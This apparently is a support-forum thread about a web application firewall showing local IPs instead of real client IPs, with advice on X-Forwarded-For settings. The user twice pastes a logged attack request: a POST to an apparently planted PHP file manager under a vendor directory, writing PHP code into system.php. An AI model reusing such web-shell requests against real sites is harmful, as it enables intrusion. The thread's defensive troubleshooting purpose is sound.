Why detect ip lan (local)
Published 10 months ago
Published 10 months ago
Safriadi
Updated 10 months ago
0
Whats wrong with my config?
Carrie
Updated 10 months ago
0
For an XFF like 1.1.1.1,2.2.2.2, if the format is not a valid IP, it may fail to parse, and the system will fall back to using the remote IP instead.
If there’s a proxy in front, you can adjust the “Get attack IP from” setting to “the rightmost IP in XFF” to correctly extract the real client IP.
Safriadi
Updated 10 months ago
0
POST /vendor/psr/log/Psr/HTn4A.php?p=&edit=system.php HTTP/1.1
Host: ppp.aa.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Content-Length: 1191
Accept: /
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,id;q=0.8
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 45.201.143.69
Cf-Ipcountry: KH
Cf-Ray: 9662791acf9b87b7-SIN
Cf-Visitor: {"scheme":"https"}
Cf-Warp-Tag-Id: ea3d5f14-2f27-4004-938a-209af4412810
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Cookie: filemanager=jshv902qpvh5n_7o3e2moSuL7tAm3qs6F4
Origin: https://ppp.aa.id
Priority: u=1, i
Referer: https://ppp.aa.id/vendor
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 45.201.143.69
X-Forwarded-Proto: https
X-Requested-With: XMLHttpRequest
{"ajax":true,"content":"<?php\nfunction get($url) {\n "}
this is attack log
Safriadi
Updated 10 months ago
0
Carrie
Updated 10 months ago
please send XFF of this attack log
Carrie
Updated 10 months ago
Please send us the full request detail shown in my image of the above request
Safriadi
Updated 10 months ago
0
my setting like this
is it true?
Safriadi
Updated 10 months ago
0
if wrong please give me advice?
Safriadi
Updated 10 months ago
0
this is request attack
POST /vendor/psr/log/Psr/HTn4A.php?p=&edit=system.php HTTP/1.1
Host: ppp.aa.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Content-Length: 1191
Accept: /
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,id;q=0.8
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 45.201.143.69
Cf-Ipcountry: KH
Cf-Ray: 9662791acf9b87b7-SIN
Cf-Visitor: {"scheme":"https"}
Cf-Warp-Tag-Id: ea3d5f14-2f27-4004-938a-209af4412810
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Cookie: filemanager=jshv902qpvh5n_7o3e2moSuL7tAm3qs6F4
Origin: https://ppp.aa.id/
Priority: u=1, i
Referer: https://ppp.aa.id/vendor
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 45.201.143.69
X-Forwarded-Proto: https
X-Requested-With: XMLHttpRequest
{"ajax":true,"content":"<?php\nfunction get($url) {\n "}